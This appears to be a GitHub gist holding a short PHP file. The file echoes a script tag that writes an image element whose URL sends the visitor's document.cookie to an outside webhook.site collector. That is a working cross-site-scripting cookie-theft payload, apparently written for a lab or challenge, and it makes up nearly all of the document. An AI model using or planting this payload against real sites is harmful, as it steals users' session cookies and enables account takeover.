Skip to content

Instantly share code, notes, and snippets.

@garymalaysia
Last active August 13, 2019 23:59
Show Gist options
  • Save garymalaysia/1f52ba3b07f5fc668137f017bfcfebcb to your computer and use it in GitHub Desktop.
Save garymalaysia/1f52ba3b07f5fc668137f017bfcfebcb to your computer and use it in GitHub Desktop.
<?php
$html = <<<EOF
<script>
document.write('<img src="http://webhook.site/c8169ecf-0b66-4835-bec9-a483fd449b15?cookie=YOU GUYS ARE THE BEST. HERE IS MY COOkie' + document.cookie +'"/>')
</script>
EOF;
echo $html;
?>
@garymalaysia
Copy link
Author

noyjinh

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment